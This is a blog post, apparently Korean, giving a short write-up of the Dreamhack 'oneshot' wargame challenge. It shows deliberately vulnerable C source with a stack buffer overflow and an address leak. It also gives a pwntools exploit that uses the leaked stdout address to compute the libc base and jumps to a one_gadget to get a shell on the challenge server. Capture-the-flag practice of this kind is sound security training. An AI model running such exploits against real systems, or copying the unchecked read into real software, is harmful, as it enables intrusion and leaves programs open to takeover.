dreamhack - oneshot write up

Notice

Recent Posts

Recent Comments

Link

« 2024/10 »
일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

Tags more

Archives

Today

Total

관리 메뉴

외로운 Nova의 작업실

dreamhack - oneshot write up 본문

Computer App Penetesting/System Vulnerability

dreamhack - oneshot write up

Nova_ 2023. 4. 21. 14:30

- source code

// gcc -o oneshot1 oneshot1.c -fno-stack-protector -fPIC -pie

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>

void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}

void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(60);
}

int main(int argc, char *argv[]) {
    char msg[16];
    size_t check = 0;

    initialize();

    printf("stdout: %p\n", stdout);

    printf("MSG: ");
    read(0, msg, 46);

    if(check > 0) {
        exit(0);
    }

    printf("MSG: %s\n", msg);
    memset(msg, 0, sizeof(msg));
    return 0;
}

- exploit code

from pwn import *

p = remote("23.81.42.210", 9729)

#get address stdout
p.recvuntil("stdout: ")
stdout = p.recvuntil("\n")[:-1]

#proc - 1 :cal base lib address
stdout = int(stdout, 16)
lib_base = stdout - 0x3c5620
one_gadget = lib_base + 0x45216

#proc -2 : payload
payload = b"A"*24 + b"\x00"*8 + b"B"*8
payload += p64(one_gadget)

#overwirte one_shot gadget
p.send(payload)

#receive print
print(p.recv())

#interactive
p.interactive()

'Computer App Penetesting > System Vulnerability' 카테고리의 다른 글

dreamhack - fho write up (0)	2023.04.24
dreamhack - hook write up (0)	2023.04.22
dreamhack - basic_rop_x86 write up (0)	2023.04.20
dreamhack - basic_rop_x64 write up (0)	2023.04.20
dreamhack 시스템해킹 - 12(ssp_001 문제 풀이) (0)	2023.02.22

'Computer App Penetesting/System Vulnerability' Related Articles

Comments

외로운 Nova의 작업실

dreamhack - oneshot write up 본문

dreamhack - oneshot write up

'Computer App Penetesting > System Vulnerability' 카테고리의 다른 글

티스토리툴바